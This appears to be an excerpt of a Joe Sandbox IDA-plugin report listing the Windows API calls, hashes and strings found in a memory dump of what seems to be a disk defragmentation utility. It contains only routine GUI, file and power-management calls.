                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c412c0476ba2fc4ae0c4b603c0ca6f6675f8a42d5d8e24ea628546f2118f678
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22412AB1508340AFC314DF68C985E5BBBE8FBC8714F048A1EF59993291DBB4E904CB66
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,1088D068), ref: 0045FBFD
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045FD6C
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00460023
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00460032
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseCreateErrorFileHandleLastUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID: \\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 2002255750-259948872
                                                                                                                                                                                                                                                                                                • Opcode ID: c925c25cf8bd047c9e5a3396a1d52339d9f8b9f25dbfcc1fd449f57c1f375c63
                                                                                                                                                                                                                                                                                                • Instruction ID: f68b579a164141f6a35d8a11ab023a6fd55b536e149a63f8f0d67cb16e8cd9f8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c925c25cf8bd047c9e5a3396a1d52339d9f8b9f25dbfcc1fd449f57c1f375c63
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53F139B15183419FC324DF25C881AAFB7E4BF89714F104A2EF99983351E778A948CB97
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 004055AD
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,...,00000003,?), ref: 0040561D
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 00405675
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExtentPoint32Text
                                                                                                                                                                                                                                                                                                • String ID: ...$`=
                                                                                                                                                                                                                                                                                                • API String ID: 223599850-889875407
                                                                                                                                                                                                                                                                                                • Opcode ID: cfd37b444cbe07eee17d323b4eeec1b5ef4d4266a78bd93aad60d0bf55c5740e
                                                                                                                                                                                                                                                                                                • Instruction ID: 472bae36e9bbe25dca023677f1d007ac7a5f0ef4219e7f68ecfc9801725c9705
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfd37b444cbe07eee17d323b4eeec1b5ef4d4266a78bd93aad60d0bf55c5740e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31E131755087059FC310DF68C884A5BBBE5FB88304F548A2EF896A33A1D774E885CF96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                • GetDIBColorTable.GDI32(00000000,?,00000001,?,?,?,004042D6,?,?,?,?,?,?,?,00000000), ref: 0040431B
                                                                                                                                                                                                                                                                                                • TransparentBlt.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,004042D6,?,?,?), ref: 00404360
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 004043F4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401270: InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401270: CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                                • AlphaBlend.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,004042D6,?), ref: 004043AC
                                                                                                                                                                                                                                                                                                • StretchBlt.GDI32(?,?,?,?,?,00000000,?,?,?,00000000,00CC0020), ref: 004043DE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ObjectSelect$AlphaBlendColorCompatibleCreateExchangeInterlockedStretchTableTransparent
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1847558199-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                                • Instruction ID: 431ece418818d9ed3e284c2d9fdf2eea9b1bc5e51d71579e1970bbd9de33fc15
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6641C9B1208740AFD214CB6AC884E2BB7E9EBCD718F108B1DF59DA3691D674ED01CB65
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00424B28
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0e9a12f4cd1428a8c886e080b16f46ae2ab08dd8028c450c4ed05d7ef20e7a6a
                                                                                                                                                                                                                                                                                                • Instruction ID: 473d6bda932dfe5e5726b0cd1595cc7b0c8836d5ab7cb817983b5e362455a3d3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e9a12f4cd1428a8c886e080b16f46ae2ab08dd8028c450c4ed05d7ef20e7a6a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A21D87176021077EB60AA94DCC6FD12354AB54B05F44407ABB04BE1C6CFEA6440CB69
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0041109B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110AE
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 004110CF
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110E2
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0041110B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0041111E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSendVisibleWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3984873885-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                                • Instruction ID: f50cee19580f5a7b4a735ae81b0960ad1265907f2bd47cc1e7f642e33356c098
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC21A070A40316ABD730DF759C41BAB7698BB88740F050A3EB649DB391EA75EC80879D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32 ref: 00429964
                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0042998F
                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 0042999A
                                                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 004299A1
                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004299B0
                                                                                                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,?,000004FF), ref: 004299C9
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1800058468-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 422089f6943f840a1857ebeeed2a55ac56a072af819dc62ccc93b1be93c737d0
                                                                                                                                                                                                                                                                                                • Instruction ID: 4b68c3bfc8aa6a65b644341b41cfaa7d1e4508deb0fbdda8f8db971c9f13aea2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 422089f6943f840a1857ebeeed2a55ac56a072af819dc62ccc93b1be93c737d0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5316BB1604311AFE310CF68DC80F6BB7E5BB88710F504A1DF648DB290E774E9848BA6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0040E9D6
                                                                                                                                                                                                                                                                                                • LPtoDP.GDI32(?,?,00000002), ref: 0040E9EE
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040EA08
                                                                                                                                                                                                                                                                                                • GetMapMode.GDI32(?,?,0047D9F0,00000000), ref: 0040EA2E
                                                                                                                                                                                                                                                                                                • DPtoLP.GDI32(?,?,00000002), ref: 0040EA45
                                                                                                                                                                                                                                                                                                • GetBkColor.GDI32(?), ref: 0040EA78
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreate$BitmapColorMode
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 451781270-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 823297d3b1078f9247b71e0cb78166e85bcb58cd2136858b8ed66297f6f43318
                                                                                                                                                                                                                                                                                                • Instruction ID: 3bfa88b0da709e4d3224c5894ad5c167e82e64c80dae2195e34fb9d2b55d46f1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 823297d3b1078f9247b71e0cb78166e85bcb58cd2136858b8ed66297f6f43318
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3931E975200600AFC724DF65D984D5BB7E9FF88700B448A2DA94A8B646DB34E944CFA5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                                • Instruction ID: c3f58fe0059228c05da5b00147ff564d140f859395390daa2f6f08e4d30ee4c4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E21FF74900F00AAE3302F21EC89717BBF4FB85741F918D2EE5C5406A0EB3594688B4A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042571B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00425737
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,?), ref: 00425888
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$InvalidateRect
                                                                                                                                                                                                                                                                                                • String ID: Button_Check$`=
                                                                                                                                                                                                                                                                                                • API String ID: 2778011698-3236272720
                                                                                                                                                                                                                                                                                                • Opcode ID: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                                • Instruction ID: 0eaeb928ae6b5a569979d6d52056a3389dc0ef6ae13505e9256ef6b005c906b2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55510432304611DFC724EF68D8C4E9BB7A4EF88320F514A2AE95597391D774FC418BAA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 00432C6E
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00432CB4
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402077$3402078$tFH
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2744557037
                                                                                                                                                                                                                                                                                                • Opcode ID: 3a14f707ade8a06f74c98b1bb9dd0f0bab00e6a46749f54205f261b932b07e13
                                                                                                                                                                                                                                                                                                • Instruction ID: 0052325b0c9a5ab111783a0a252863c2f47d3c18ee4d5c8230f443e5887af2fe
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a14f707ade8a06f74c98b1bb9dd0f0bab00e6a46749f54205f261b932b07e13
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 415160712083819FD325EF20DE99FDBB7E4AF99704F00491EF18E92191CBB46948CB5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenThemeData.UXTHEME(?,LISTVIEW,00000001), ref: 00416A0B
                                                                                                                                                                                                                                                                                                • DrawThemeBackground.UXTHEME(?,?,00000006,00000002,?,00000000,?,00FFFFFF), ref: 00416A5D
                                                                                                                                                                                                                                                                                                • CloseThemeData.UXTHEME(?), ref: 00416A68
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00416A89
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416430: GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416430: InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416430: GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416430: GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416430: InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectTheme$DataParent$BackgroundCloseDrawInflateInvalidateMessageOpenSendWindow
                                                                                                                                                                                                                                                                                                • String ID: LISTVIEW
                                                                                                                                                                                                                                                                                                • API String ID: 2600991427-1680257557
                                                                                                                                                                                                                                                                                                • Opcode ID: 0229e11747b3cd2e378b549adb87a154061692a6bd490272b80820133ddceee6
                                                                                                                                                                                                                                                                                                • Instruction ID: fa80797a93d1b306fb8333d11dc9e085901b6c38828278b42b81b7196f356a38
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0229e11747b3cd2e378b549adb87a154061692a6bd490272b80820133ddceee6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 415106B56083009FC314DF68C981A6BB7E9FF88744F108A2EF59987390D778E945CB96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00424680
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042471F
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000002,000003E8,00000000), ref: 0042474F
                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000002), ref: 00424770
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Timer$InvalidateKillRectRedrawWindow
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 4168450595-2762138152
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32 ref: 0041DC8E
                                                                                                                                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0041DCBD
                                                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(0047D9D0,00000000), ref: 0041DD06
                                                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(1088D068,00000000), ref: 0041DD33
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Path$LongName$BrowseFolderFromList
                                                                                                                                                                                                                                                                                                • String ID: 3402075
                                                                                                                                                                                                                                                                                                • API String ID: 4132326259-2194680865
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A883
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                                • SHCreateDirectory.SHELL32(00000000,?,?,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Path$CreateDirectoryExistsFileFolderSpecial
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag$\DiskDefrag
                                                                                                                                                                                                                                                                                                • API String ID: 106629909-1352560241
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ObjectSelect
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 1517587568-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 116e8130f725741a0df8cffd76ef37318a9139d2394634156b2cf1340f76da15
                                                                                                                                                                                                                                                                                                • Instruction ID: 398bc34aaeb48a28786a3eeef8d096b9ba9882d646282afc346b5bddce66a1f9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 116e8130f725741a0df8cffd76ef37318a9139d2394634156b2cf1340f76da15
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36417E32200A048FD724EFA9E884E6BF3A5EF94321B05852FE84A97611DB35F840CB55
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(PowrProf.dll,00000001,?,0042198D,00000002), ref: 0041E189
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetSuspendState), ref: 0041E19B
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0041E1B7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                                                                                                                                • API String ID: 145871493-1420736420
                                                                                                                                                                                                                                                                                                • Opcode ID: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                                • Instruction ID: 1295b46436a6d6ef84abe92a3e8f017b2096165fdcf3e5832b2fc3faa33b59df
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2E04F357012606B527117366C48D9F2A68DFC1B91349467EF819D1294DF38C9828AAA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00467820: DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                                • GdiplusShutdown.GDIPLUS(?,?,1088D068,00093C38,?,?,00093E00,?,00000000,0047812F,000000FF,0041A4F1,1088D068,00093C38,?,00093E00), ref: 00465814
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004658CF
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00465921
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00465973
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004659C5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteObject$GdiplusShutdown
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1337965791-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3a50086e46136d6d50168286cddb443a9cc0a0107472165b4ab84f4d896fe486
                                                                                                                                                                                                                                                                                                • Instruction ID: 5b8780734ed73be5f4f2893b0bea8a6c3b62fc8eaf033f1e837d6edea0f0e4aa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a50086e46136d6d50168286cddb443a9cc0a0107472165b4ab84f4d896fe486
